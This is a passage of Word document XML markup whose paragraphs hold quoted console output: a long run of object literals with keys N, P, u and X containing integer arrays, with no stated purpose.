        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E088F03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59635056" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DE2F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8CA89" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EDB70" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005204C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB4B775" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EEF805" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [20, 26, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ADAA77" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571581E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484E5C47" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0136E06C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 10, 11, 200, 303]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C2D6F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5277B685" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1DE53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDAFBC1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 7, 8, 100, 255]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F900A5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A7224" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53198B65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16058400" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA5B376" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2B04D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32924C52" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3186B12B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 23, 27, 71, 108, 134, 219, 232, 260, 298, 303, 319, 343]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17478E1F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F240A63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AF4A9D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 6, 8, 9, 10, 13, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CE29ED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 7, 11, 12, 17, 26, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B281D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAEB129" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CF3675" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568E1B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7568A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AFB3AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208CF6B6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE173D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1625E323" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46877BFF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ACCE03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6823E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C363474" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06871053" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0689ECE3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745184CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 6, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7660791F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E139391" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001124E1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC08150" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 3, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702DAF08" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A0ACA3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660B9DE3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B501E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4916DF19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D79964E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C87E81C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E02F5F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [21, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37862801" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B975B2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E50481" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEAB6B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 6, 8, 13, 21, 24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40702288" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E9A103" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D2AF42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A2F2D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 64, 93, 100, 129, 147, 153, 229, 249, 270, 279, 282, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C108DAB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42179510" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE6CA4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5AA3A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [15, 21, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0944E981" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BEB74E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B0314" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01E4A5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [27, 250, 298]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD4144" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADB7CE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 11,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171151A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 9, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A437A48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3, 4, 5, 6, 7, 8, 9, 10, 12, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B71552" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 317, 320]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB99353" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55BB42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFDA039" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F8B553" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 12, 16, 27, 78]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68510C7D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0859015D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995FA1E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A9269D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B4D73" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [42, 79]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1316E449" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70407E23" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533F8B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D8F21F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 321]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD7C48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C25BB03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84284D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0ACD03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3, 4, 7, 8, 9, 10, 11, 12, 13, 17, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C67F163" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA44234" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8C7333" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692C28BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E23EA39" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD6773" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D658FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1420637D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [72, 73]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39955EC5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3261736C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F95D77D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1278CDC6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7AE5F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D5280B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546E1CBD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F516A56" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11691965" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FFFB5B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025A865D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E14904" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [74, 190, 298]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBB173E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A776883" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F12BE8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2E0D3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 10, 280]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBED293" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA11D27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE85383" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD8831D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [153]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2A9DB1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F064F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715D62FD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AB8444" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFDDE07" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523B644B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
